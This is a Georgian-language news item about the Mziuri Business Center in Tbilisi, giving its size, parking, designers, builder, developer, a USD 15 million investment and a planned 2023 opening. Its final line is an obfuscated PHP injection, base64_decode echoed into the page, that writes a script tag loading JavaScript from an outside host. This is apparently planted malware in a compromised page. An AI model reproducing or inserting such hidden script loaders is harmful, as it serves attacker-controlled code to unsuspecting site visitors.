celsiusi
ავერსი შნაიდერი
Cushman & Wakefield Georgia პროექტის გაქირავებისა და მარკეტინგის კამპანიას ექკლუზიურად მართავს და აწარმოებს მოლაპარაკებებს ადგილობრივ და საერთაშორისო კომპანიებთან, – ამის შესახებ ინფორმაციას კომპანია სოციალურ ქსელში ავრცელებს. 
 
მზიური ბიზნეს ცენტრი მორგებულია საქმიანი ადამიანების სრულ კომფორტზე. 7 სართულიან ბიზნეს ცენტრში 10 000 კვ.მ. სივრცე გათვალისწინებულია საოფისე დანიშნულებისთვის. ბიზნეს ცენტრში გათვალისწინებულია 300 მანქანაზე გათვლილი საპარკინგე სივრცე.
 
ეკოლოგიურად სუფთა გარემო და სიმწვანე „მზიური ბიზნეს ცენტრის“ პრიორიტეტია. გარე პერიმეტრის გამწვანებასა და ლანდშაფტის დიზაინზე მიმდინარეობს აქტიური მუშაობა. ცენტრის პირველ სართულზე წარმოდგენილი იქნება სხვადასხვა ტიპის კაფეები და რესტორნები.
  
ბიზნეს ცენტრი გამორჩეულია თავისი არქიტექტურით, რომლის ავტორიც დავით გოგიჩაიშვილი და მისი კომპანიის „ჰაუსარტის“ გუნდია. ბიზნეს ცენტრის ინტერიერის დიზაინზე ნინო არზიანმა იმუშავა. შენობის ლობის თანამედროვე დიზაინი და კონცეფცია სრულად მორგებულია საქმიან ადამიანებზე და მათ კომფორტზე. 
 
პროექტის სამშენებლო ნაწილს კომპანია „დომუსი“ უზრუნველყოფს. შენობაში გამოყენებულია უმაღლესი ხარისხის მასალები; მზიურის ბიზნეს ცენტრი სრულად მორგებულია შშმ პირებზე.
 
„მზიური ბიზნეს ცენტრის“ დეველოპერი კომპანია შპს „გამაა“. პროექტის საერთო ინვესტიცია 15 მილიონ აშშ დოლარს შეადგენს.
 
ბიზნეს ცენტრის გახსნა დაგეგმილია 2023 წლის ზაფხულში. 
956
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");